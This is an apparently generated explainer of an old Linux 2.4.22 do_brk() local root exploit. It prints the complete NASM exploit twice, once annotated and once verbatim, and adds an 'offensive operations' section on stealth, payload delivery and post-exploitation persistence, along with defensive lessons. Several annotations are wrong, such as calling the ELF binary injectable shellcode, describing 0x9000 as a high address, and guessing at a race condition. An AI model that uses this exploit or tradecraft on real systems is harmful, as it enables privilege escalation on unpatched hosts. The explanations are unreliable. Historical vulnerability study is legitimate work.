Linux Kernel 2.4.22 'do_brk()' Local Privilege Escalation Explained

Linux Kernel 2.4.22 'do_brk()' Local Privilege Escalation Explained
What this paper is
This paper describes a local privilege escalation vulnerability in the Linux kernel version 2.4.22. The vulnerability lies within the do_brk() system call, which is used to change the size of the program's data segment (heap). By manipulating this system call with specific arguments, a local user can gain root privileges. The exploit provided is a piece of shellcode designed to be executed by a local user.
Simple technical breakdown
The core of the vulnerability is how the kernel handles memory mapping requests through the brk() system call. Normally, brk() is used by programs to dynamically allocate or deallocate memory on the heap. The exploit leverages a flaw in the do_brk() implementation that allows an attacker to trick the kernel into mapping memory at an address that overlaps with critical kernel data structures.
Specifically, the exploit uses a high virtual address as a base for expanding the break (heap). This is done to bypass a check within sys_brk() that verifies if there's enough available memory. By forcing the kernel to map memory in a way that conflicts with its own internal structures, the exploit can overwrite crucial kernel data, leading to privilege escalation.
The exploit also includes steps to ensure the stack is positioned correctly and to lock memory, which are common techniques in shellcode to improve reliability and avoid detection.
Complete code and payload walkthrough
The provided code is NASM assembly for a 32-bit Linux system. It's designed to be compiled into shellcode.
; E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/131/
;
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000 ; Sets the base address for the shellcode.
; This is a common high address for the stack.
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident: Magic bytes for ELF file.
times 9 db 0 ; Padding.
dw 2 ; e_type: ET_EXEC (Executable).
dw 3 ; e_machine: EM_386 (Intel 80386).
dd 1 ; e_version: EV_CURRENT.
dd _start ; e_entry: Entry point address.
dd phdr - $$ ; e_phoff: Offset to program header table.
dd 0 ; e_shoff: Offset to section header table (not used here).
dd 0 ; e_flags: Processor-specific flags.
dw ehdrsize ; e_ehsize: ELF header size.
dw phdrsize ; e_phentsize: Size of each program header entry.
dw 2 ; e_phnum: Number of program header entries.
dw 0 ; e_shentsize: Size of each section header entry (not used).
dw 0 ; e_shnum: Number of section header entries (not used).
dw 0 ; e_shstrndx: Section header string table index (not used).
ehdrsize equ $ - ehdr ; Calculates the size of the ELF header.
phdr: ; Elf32_Phdr
dd 1 ; p_type: PT_LOAD (Loadable segment).
dd 0 ; p_offset: File offset (0 for this segment).
dd $$ ; p_vaddr: Virtual address (same as current address).
dd $$ ; p_paddr: Physical address (same as virtual address).
dd filesize ; p_filesz: Size in file.
dd filesize ; p_memsz: Size in memory.
dd 7 ; p_flags: PF_R | PF_W | PF_X (Read, Write, Execute).
dd 0x1000 ; p_align: Alignment (1 page).
phdrsize equ $ - phdr ; Calculates the size of the program header.
_start: ; Entry point of the shellcode.
; ** Make sure the stack is not above us
mov eax, 163 ; System call number for mremap.
mov ebx, esp ; Current stack pointer.
and ebx, ~(0x1000 - 1) ; Align stack pointer to a page boundary (lower address).
; This ensures the new mapping is below the current stack.
mov ecx, 0x1000 ; Size of the memory region to move (1 page).
mov edx, 0x9000 ; New address for the memory region. This is a high address,
; ensuring it's above the potential heap expansion.
mov esi,1 ; Flag MREMAP_MAYMOVE: Allows the kernel to move the memory region.
int 0x80 ; Execute the mremap system call.
; After mremap, esp might point to a new location.
; We need to adjust it to be within the mapped page and potentially move it down.
and esp, (0x1000 - 1) ; Offset within the new page.
add esp, eax ; Add the return value of mremap (new address of the mapped region)
; to the stack pointer. This moves the stack pointer to the
; beginning of the newly mapped region.
; nb: we don't fix
; pointers so environ/cmdline
; are not available
; This comment indicates that environment variables and command-line
; arguments might become inaccessible due to stack manipulation.
mov eax,152 ; System call number for mlockall.
mov ebx,2 ; Flag MCL_FUTURE: Lock all future memory mappings.
int 0x80 ; Execute mlockall system call. This prevents memory from being swapped out.
; get VMAs for the kernel memory
mov eax,45 ; System call number for brk.
mov ebx,0xC0500000 ; Target address for brk. This is a high virtual address,
; likely within kernel space or a region the kernel
; might map for its own purposes.
int 0x80 ; Execute the brk system call. This is the core of the exploit.
; The kernel attempts to expand the heap to this address.
; If successful, it overwrites kernel memory.
mov ecx, 4 ; Loop counter for forking.
loop0:
mov eax, 2 ; System call number for fork.
int 0x80 ; Execute the fork system call. This creates child processes.
; The purpose of forking multiple times is likely to
; increase the chances of the exploit succeeding by
; having multiple processes attempting the same attack,
; or to consume resources in a way that might trigger
; the vulnerability in a race condition.
loop loop0 ; Decrement ecx and loop if not zero.
_idle:
mov eax,162 ; System call number for nanosleep.
mov ebx,timespec ; Pointer to timespec structure.
int 0x80 ; Execute nanosleep system call. This puts the process to sleep.
jmp _idle ; Infinite loop, keeping the process alive.
timespec dd 10,0 ; Structure for nanosleep: 10 seconds, 0 nanoseconds.
filesize equ $ - $$ ; Calculates the total size of the shellcode.
; milw0rm.com [2003-12-02]Mapping of code fragments to practical purpose:
org 0xBFFF0000: Sets the base address for the shellcode, aiming for a high stack address.- ELF Header (
ehdr): Standard ELF header structure to make the shellcode executable by the kernel/loader. - Program Header (
phdr): Defines a loadable segment with read, write, and execute permissions. _start:: The entry point of the shellcode.mov eax, 163; mov ebx, esp; and ebx, ~(0x1000 - 1); mov ecx, 0x1000; mov edx, 0x9000; mov esi, 1; int 0x80: This block performsmremap. It attempts to move the current stack (esp) to a new location (0x9000) after aligning it to a page boundary. TheMREMAP_MAYMOVEflag is used. The intention is to ensure the stack is at a high address, below the target forbrk.and esp, (0x1000 - 1); add esp, eax: Adjusts the stack pointer aftermremap.eaxwill contain the new base address of the mapped memory returned bymremap. This effectively moves the stack to the beginning of the newly mapped region.mov eax, 152; mov ebx, 2; int 0x80: This block executesmlockall(MCL_FUTURE). It locks all current and future memory mappings, preventing them from being swapped out. This can help stabilize the exploit.mov eax, 45; mov ebx, 0xC0500000; int 0x80: This is the critical part. It callsbrk(0xC0500000). The kernel'sdo_brk()function is called with a target address (0xC0500000) that is intended to cause a memory mapping conflict, overwriting kernel memory.mov ecx, 4; loop0: mov eax, 2; int 0x80; loop loop0: This loop executesfork()four times. The purpose is likely to increase the chances of a race condition or to create multiple processes that might trigger the vulnerability._idle: mov eax, 162; mov ebx, timespec; int 0x80; jmp _idle: This section puts the process into an infinite sleep usingnanosleep. This keeps the shellcode running and the process alive after the exploit attempt.timespec dd 10,0: Defines atimespecstructure fornanosleep, specifying a sleep duration of 10 seconds.filesize equ $ - $$: Calculates the total size of the generated shellcode.
Practical details for offensive operations teams
- Required Access Level: Local user access to a vulnerable Linux system. No elevated privileges are initially required.
- Lab Preconditions:
- A Linux system running kernel version 2.4.22. This is a very old kernel and likely not found on modern systems.
- A C compiler and NASM assembler to compile the exploit code into shellcode.
- A method to inject and execute the shellcode (e.g., a separate exploit that provides code execution, or manual execution if possible in a controlled environment).
- Tooling Assumptions:
- NASM (Netwide Assembler) for assembling the shellcode.
- A C compiler (like GCC) to create a wrapper program to load and execute the shellcode, or a debugger to inject it.
- Kernel debugging tools might be useful for understanding the exploit's behavior in a lab environment.
- Execution Pitfalls:
- Kernel Version Specificity: This exploit is highly dependent on the exact kernel version (2.4.22). Any minor patch or update could render it ineffective.
- Memory Layout Variations: While the exploit attempts to manage stack placement, variations in memory layout (due to kernel configuration or other running processes) could affect its reliability.
- Security Mitigations: Modern systems have numerous security features (like PaX, ASLR, SELinux) that would prevent this exploit from working. The exploit's comments explicitly mention "no PaX w/ ASLR" as a condition.
- Race Conditions: The
fork()loop suggests a potential reliance on race conditions. If the kernel state isn't precisely right whenbrk()is called, the exploit might fail. - Shellcode Size: The shellcode needs to be injected into a process. Its size and the available buffer space are critical.
- Target Address Stability: The target address
0xC0500000is a high virtual address. Its exact meaning and availability can vary between kernel configurations and system states.
- Tradecraft Considerations:
- Stealth: Executing shellcode directly might be detected by host-based intrusion detection systems (HIDS) if not carefully managed.
- Payload Delivery: The shellcode needs to be delivered and executed. This often involves chaining with another vulnerability or exploiting a misconfiguration.
- Post-Exploitation: Once root is achieved, the attacker would typically establish persistence, exfiltrate data, or further compromise the system. The
nanosleeploop keeps the process alive, but it's not a robust persistence mechanism.
Where this was used and when
This exploit was published in December 2003. It targets a specific vulnerability in the Linux kernel 2.4.22. While concrete public reports of this specific exploit being used in the wild are scarce due to the age of the vulnerability and the nature of exploit disclosure, it represents a class of vulnerabilities that were prevalent in older kernel versions before significant hardening measures were implemented. Such exploits would have been used by attackers targeting systems running these older, vulnerable Linux distributions.
Defensive lessons for modern teams
- Kernel Patching is Paramount: The most crucial defense is to keep the operating system and kernel up-to-date with security patches. This exploit targets a specific, unpatched vulnerability.
- Understand Memory Management: While direct exploitation of
brk()is less common now, understanding how the kernel manages virtual memory and heap allocations is vital for analyzing potential memory corruption vulnerabilities. - Mitigation Features: Modern kernels incorporate defenses like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP/NX bit), and kernel hardening techniques (like PaX, though often integrated into the kernel itself). These significantly raise the bar for local privilege escalation.
- Principle of Least Privilege: Ensure that applications and users run with the minimum privileges necessary. This limits the impact of a successful compromise.
- Intrusion Detection: Host-based Intrusion Detection Systems (HIDS) can detect unusual system call patterns or attempts to execute shellcode.
- System Call Auditing: Monitoring critical system calls like
brk,mremap, andforkcan help identify suspicious activity.
ASCII visual (if applicable)
This exploit manipulates memory mappings and the stack. A simplified visual representation of the intended memory state before and after the brk() call could be:
Before Exploit (Simplified):
+-------------------+ <-- High Memory Addresses
| |
| Kernel Space |
| |
+-------------------+
| |
| User Space |
| (Heap) |
+-------------------+
| User Space |
| (Stack) |
+-------------------+ <-- Low Memory Addresses
After Exploit's brk(0xC0500000) (Conceptual):
+-------------------+ <-- High Memory Addresses
| |
| Kernel Space |
| (Overwritten) | <-- The brk call attempts to map memory here,
| | overwriting critical kernel data.
+-------------------+
| User Space |
| (Heap) |
+-------------------+
| User Space |
| (Stack) |
+-------------------+ <-- Low Memory AddressesExplanation: The exploit first manipulates the stack to ensure it's at a high virtual address. Then, it calls brk() with a target address (0xC0500000) that is intended to fall within or overlap with kernel memory regions. The kernel's do_brk() function, when vulnerable, might incorrectly map user-controlled memory into this kernel space, leading to overwriting critical kernel data structures and thus privilege escalation.
Source references
- PAPER ID: 129
- PAPER TITLE: Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
- AUTHOR: Christophe Devine
- PUBLISHED: 2003-12-02
- KEYWORDS: Linux,local
- PAPER URL: https://www.exploit-db.com/papers/129
- RAW URL: https://www.exploit-db.com/raw/129
Original Exploit-DB Content (Verbatim)
; E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/131/
;
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
; ** Make sure the stack is not above us
mov eax, 163 ; mremap
mov ebx, esp
and ebx, ~(0x1000 - 1) ; align to page size
mov ecx, 0x1000 ; we suppose stack is one page only
mov edx, 0x9000 ; be sure it can't get mapped after
; us
mov esi,1 ; MREMAP_MAYMOVE
int 0x80
and esp, (0x1000 - 1) ; offset in page
add esp, eax ; stack ptr to new location
; nb: we don't fix
; pointers so environ/cmdline
; are not available
mov eax,152 ; mlockall (for tests as root)
mov ebx,2 ; MCL_FUTURE
int 0x80
; get VMAs for the kernel memory
mov eax,45 ; brk
mov ebx,0xC0500000
int 0x80
mov ecx, 4
loop0:
mov eax, 2 ; fork
int 0x80
loop loop0
_idle:
mov eax,162 ; nanosleep
mov ebx,timespec
int 0x80
jmp _idle
timespec dd 10,0
filesize equ $ - $$
; milw0rm.com [2003-12-02]